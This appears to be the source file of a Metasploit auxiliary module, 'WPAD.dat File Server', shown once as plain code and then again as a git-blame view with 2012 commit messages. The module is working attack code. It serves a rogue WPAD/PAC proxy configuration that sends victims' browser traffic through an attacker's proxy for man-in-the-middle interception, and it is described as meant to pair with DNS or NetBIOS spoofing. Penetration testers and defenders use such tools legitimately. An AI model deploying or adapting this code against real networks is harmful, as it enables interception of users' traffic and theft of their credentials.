metasploit-framework/modules/auxiliary/server/wpad.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Auxiliary::Report

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'WPAD.dat File Server',
			'Description' => %q{
					This module generates a valid wpad.dat file for WPAD mitm
				attacks. Usually this module is used in combination with DNS attacks
				or the 'NetBIOS Name Service Spoofer' module. Please remember as the
				server will be running by default on TCP port 80 you will need the
				required privileges to open that port.
			},
			'Author'      =>
				[
					'et'            # Metasploit module
				],
			'License'     => MSF_LICENSE,
			'DefaultOptions' =>
				{
					'SRVPORT' => 80
				},
			'Passive' => true))

		register_options(
			[
				OptEnum.new('TYPE', [true, 'WPAD/PAC Data File', 'DAT', ['DAT', 'PAC']]),
				OptAddress.new('EXCLUDENETWORK', [ true, "Network to exclude",'127.0.0.1' ]),
				OptAddress.new('EXCLUDENETMASK', [ true, "Netmask to exclude",'255.255.255.0' ]),
				OptAddress.new('PROXY', [ true, "Proxy to redirect traffic to", '0.0.0.0' ]),
				OptPort.new('PROXYPORT',[ true, "Proxy port", 8080 ])
			], self.class)

		deregister_options('URIPATH')
	end


	def cleanup
		datastore['URIPATH'] = @previous_uri
	end


	def on_request_uri(cli, request)
		print_status("Request '#{request.method} #{request.headers['user-agent']}")

		return if request.method == "POST"

		html = <<-EOS
function FindProxyForURL(url, host) {
      // URLs within this network are accessed directly
      if (isInNet(host, "#{datastore['EXCLUDENETWORK']}", "#{datastore['EXCLUDENETMASK']}"))
      {
         return "DIRECT";
      }
      return "PROXY #{datastore['PROXY']}:#{datastore['PROXYPORT']}; DIRECT";
   }
EOS

		print_status("Sending WPAD config ...")
		send_response_html(cli, html,
			{
				'Content-Type' => 'application/x-ns-proxy-autoconfig'
			})
	end


	def run
		@previous_uri = datastore['URIPATH']
		datastore['URIPATH'] = (datastore['TYPE'] == 'DAT') ? 'wpad.dat' : 'proxy.pac'

		print_status("Serving #{datastore['URIPATH']} on port #{datastore['SRVPORT']}")

		begin
			exploit
		rescue Errno::EACCES => e
			if e.message =~ /Permission denied - bind/
				print_error("You need to have permission to bind to #{datastore['SRVPORT']}")
			else
				raise e
			end
		end
	end

end
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::HttpServer::HTML`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'WPAD.dat File Server',`
			`'Description' => %q{`
Full msftidy compliant 2012-07-01 03:08:10 +00:00			`This module generates a valid wpad.dat file for WPAD mitm`
			`attacks. Usually this module is used in combination with DNS attacks`
More formatting. 2012-07-01 02:21:56 +00:00			`or the 'NetBIOS Name Service Spoofer' module. Please remember as the`
Full msftidy compliant 2012-07-01 03:08:10 +00:00			`server will be running by default on TCP port 80 you will need the`
			`required privileges to open that port.`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`},`
			`'Author' =>`
			`[`
			`'et' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
Full msftidy compliant 2012-07-01 03:08:10 +00:00			`'DefaultOptions' =>`
			`{`
			`'SRVPORT' => 80`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`},`
Actions removed. 2012-07-02 15:57:32 +00:00			`'Passive' => true))`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00
			`register_options(`
			`[`
Apply additional changes from #549 From pull request #549. Changes include: * Use OptEnum to enforce the use of wpad.dat or proxy.pac * Remove cli.peerhost:cli.peerport, the API does that already * cleanup function to restore uripath datastore option * More friendly error when the user doesn't have enough permission to bind to port 80, that way they don't blame it's a bug on msf. * Remove unnecessary SVN stuff in modinfo 2012-07-07 20:59:16 +00:00			`OptEnum.new('TYPE', [true, 'WPAD/PAC Data File', 'DAT', ['DAT', 'PAC']]),`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`OptAddress.new('EXCLUDENETWORK', [ true, "Network to exclude",'127.0.0.1' ]),`
			`OptAddress.new('EXCLUDENETMASK', [ true, "Netmask to exclude",'255.255.255.0' ]),`
			`OptAddress.new('PROXY', [ true, "Proxy to redirect traffic to", '0.0.0.0' ]),`
			`OptPort.new('PROXYPORT',[ true, "Proxy port", 8080 ])`
			`], self.class)`
Apply additional changes from #549 From pull request #549. Changes include: * Use OptEnum to enforce the use of wpad.dat or proxy.pac * Remove cli.peerhost:cli.peerport, the API does that already * cleanup function to restore uripath datastore option * More friendly error when the user doesn't have enough permission to bind to port 80, that way they don't blame it's a bug on msf. * Remove unnecessary SVN stuff in modinfo 2012-07-07 20:59:16 +00:00
			`deregister_options('URIPATH')`
			`end`


			`def cleanup`
			`datastore['URIPATH'] = @previous_uri`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`end`
Full msftidy compliant 2012-07-01 03:08:10 +00:00
Apply additional changes from #549 From pull request #549. Changes include: * Use OptEnum to enforce the use of wpad.dat or proxy.pac * Remove cli.peerhost:cli.peerport, the API does that already * cleanup function to restore uripath datastore option * More friendly error when the user doesn't have enough permission to bind to port 80, that way they don't blame it's a bug on msf. * Remove unnecessary SVN stuff in modinfo 2012-07-07 20:59:16 +00:00
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`def on_request_uri(cli, request)`
Apply additional changes from #549 From pull request #549. Changes include: * Use OptEnum to enforce the use of wpad.dat or proxy.pac * Remove cli.peerhost:cli.peerport, the API does that already * cleanup function to restore uripath datastore option * More friendly error when the user doesn't have enough permission to bind to port 80, that way they don't blame it's a bug on msf. * Remove unnecessary SVN stuff in modinfo 2012-07-07 20:59:16 +00:00			`print_status("Request '#{request.method} #{request.headers['user-agent']}")`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00
			`return if request.method == "POST"`

			`html = <<-EOS`
			`function FindProxyForURL(url, host) {`
Full msftidy compliant 2012-07-01 03:08:10 +00:00			`// URLs within this network are accessed directly`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`if (isInNet(host, "#{datastore['EXCLUDENETWORK']}", "#{datastore['EXCLUDENETMASK']}"))`
			`{`
			`return "DIRECT";`
			`}`
			`return "PROXY #{datastore['PROXY']}:#{datastore['PROXYPORT']}; DIRECT";`
			`}`
			`EOS`

			`print_status("Sending WPAD config ...")`
			`send_response_html(cli, html,`
			`{`
			`'Content-Type' => 'application/x-ns-proxy-autoconfig'`
			`})`
			`end`

Apply additional changes from #549 From pull request #549. Changes include: * Use OptEnum to enforce the use of wpad.dat or proxy.pac * Remove cli.peerhost:cli.peerport, the API does that already * cleanup function to restore uripath datastore option * More friendly error when the user doesn't have enough permission to bind to port 80, that way they don't blame it's a bug on msf. * Remove unnecessary SVN stuff in modinfo 2012-07-07 20:59:16 +00:00
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`def run`
Apply additional changes from #549 From pull request #549. Changes include: * Use OptEnum to enforce the use of wpad.dat or proxy.pac * Remove cli.peerhost:cli.peerport, the API does that already * cleanup function to restore uripath datastore option * More friendly error when the user doesn't have enough permission to bind to port 80, that way they don't blame it's a bug on msf. * Remove unnecessary SVN stuff in modinfo 2012-07-07 20:59:16 +00:00			`@previous_uri = datastore['URIPATH']`
			`datastore['URIPATH'] = (datastore['TYPE'] == 'DAT') ? 'wpad.dat' : 'proxy.pac'`

			`print_status("Serving #{datastore['URIPATH']} on port #{datastore['SRVPORT']}")`

			`begin`
			`exploit`
			`rescue Errno::EACCES => e`
			`if e.message =~ /Permission denied - bind/`
			`print_error("You need to have permission to bind to #{datastore['SRVPORT']}")`
			`else`
			`raise e`
			`end`
			`end`
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`end`
Apply additional changes from #549 From pull request #549. Changes include: * Use OptEnum to enforce the use of wpad.dat or proxy.pac * Remove cli.peerhost:cli.peerport, the API does that already * cleanup function to restore uripath datastore option * More friendly error when the user doesn't have enough permission to bind to port 80, that way they don't blame it's a bug on msf. * Remove unnecessary SVN stuff in modinfo 2012-07-07 20:59:16 +00:00
All fixes applied to wpad module. 2012-07-01 01:57:59 +00:00			`end`